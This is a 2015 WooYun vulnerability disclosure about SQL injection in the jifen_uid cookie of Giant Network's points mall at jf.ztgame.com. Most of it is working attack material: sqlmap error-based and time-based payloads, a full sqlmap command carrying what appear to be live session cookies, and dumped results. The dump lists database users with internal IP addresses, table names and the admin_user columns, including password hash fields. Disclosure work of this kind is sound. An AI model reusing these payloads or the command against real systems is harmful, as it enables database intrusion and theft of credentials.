Vulnerability summary

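Bug ID: wooyun-2015-0140678

Title: SQL injection in the Giant Network (巨人网络) points mall

Vendor: Giant Network (巨人网络)

Author: 路人甲

Submitted: 2015-09-13 09:28

Fixed: 2015-09-18 09:30

Disclosed: 2015-09-18 09:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]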

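Vulnerability details

Disclosure status:

2015-09-13: Details reported to the vendor; awaiting vendor handling
2015-09-18: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

PS: I submitted this once before and it never got approved.
This time I'll add more screenshots and list some of the data.

Detailed description: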

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: jifen_uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: check_cookie_jsztgamecom=123; uniqid=1509021020226374620803; uniqid
_a=1509021020226374620803; ref=0; date=2015-09-02+10%3A20%3A22; ref_date=2015-09
-02+10%3A20%3A22; _jslog_logininfo_yzd=eyI0MTI5MjEyODEiOl
siNDEyOTIxMjgxIiwiMjAxNS0wOS0wMiAxMDoyMToyNyIsMiwiTlVMTCIsIk5VTEwiXX0%3D; jifen_
uid=412921281 AND (SELECT 8728 FROM(SELECT COUNT(*),CONCAT(0x3a677a733a,(SELECT
(CASE WHEN (8728=8728) THEN 1 ELSE 0 END)),0x3a626f783a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a); jifen_account=starjun; jifen_ha
sh=14e32109c896ed40085e93a70aeef359
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: check_cookie_jsztgamecom=123; uniqid=1509021020226374620803; uniqid
_a=1509021020226374620803; ref=0; date=2015-09-02+10%3A20%3A22; ref_date=2015-09
-02+10%3A20%3A22; _jslog_logininfo_yzd=eyI0MTI5MjEyODEiOl
siNDEyOTIxMjgxIiwiMjAxNS0wOS0wMiAxMDoyMToyNyIsMiwiTlVMTCIsIk5VTEwiXX0%3D; jifen_
uid=412921281 AND SLEEP(5); jifen_account=starjun; jifen_hash=14e32109c896ed4008
5e93a70aeef359
---
[09:39:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25, PHP 5.4.4
back-end DBMS: MySQL 5.0
[09:39:45] [INFO] fetching current database
[09:39:45] [INFO] resumed: vip
current database: 'vip'
SQLMAP:
D:\安全测试\sqlmapproject-sqlmap-b5060c0>sqlmap.py -u "http://jf.ztgame.com" --c
ookie "check_cookie_jsztgamecom=123; uniqid=1509021020226374620803; uniqid_a=150
9021020226374620803; ref=0; date=2015-09-02+10%3A20%3A22; ref_date=2015-09-02+10
%3A20%3A22; _jslog_logininfo_yzd=eyI0MTI5MjEyODEiOlsiNDEy
OTIxMjgxIiwiMjAxNS0wOS0wMiAxMDoyMToyNyIsMiwiTlVMTCIsIk5VTEwiXX0%3D; jifen_uid=41
2921281; jifen_account=starjun; jifen_hash=14e32109c896ed40085e93a70aeef359" --l
evel 5 --users

Proof of vulnerability:

1: Databases

(screenshot: 1.png)


2:users
database management system users [243]:
[*] ''@'localhost'
[*] 'jfsc'@'172.30.206.44'
[*] 'jfsc'@'172.30.206.45'
[*] 'jfsc'@'172.30.206.50'
[*] 'mmm_agent'@'172.30.206.46'
[*] 'mmm_agent'@'172.30.206.47'
[*] 'mmm_agent'@'172.30.206.48'
[*] 'mmm_agent'@'172.30.206.49'
[*] 'mmm_monitor'@'172.30.206.17'
[*] 'read'@'172.30.206.19'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'slave'@'172.30.206.46'
[*] 'slave'@'172.30.206.47'
[*] 'slave'@'172.30.206.48'
[*] 'slave'@'172.30.206.49'
[*] 'vip'@'172.30.206.%'
[*] 'write'@'172.30.206.18'
3: tables
[2410 tables]
+-------------------------+
| a0_a0_fill              |
| admin_db                |
| admin_delivery          |
| admin_file              |
| admin_pack              |
| admin_pack_cb           |
| admin_phone_bind        |
| admin_shenhe            |
| admin_user              |
| data_20140423           |
| last_login_0            |
| last_login_1            |
| last_login_10           |
| last_login_100          |
| last_login_101          |
4: columns
Database: vip
Table: admin_user
[15 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| api_passwd     | char(32)     |
| game_per       | mediumtext   |
| group          | varchar(20)  |
| hash           | char(32)     |
| index_per      | mediumtext   |
| is_ban         | tinyint(11)  |
| is_super_admin | tinyint(4)   |
| m_hash         | char(32)     |
| m_passwd       | char(32)     |
| passwd         | char(32)     |
| position       | varchar(20)  |
| server_ip      | varchar(256) |
| url_per        | mediumtext   |
| user_id        | int(11)      |
| user_name      | varchar(40)  |
+----------------+--------------+
5: data

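Remediation:

See the title.

Copyright notice: when reposting, please credit the source 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: No impact; ignored by the vendor

Ignored at: 2015-09-18 09:30

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet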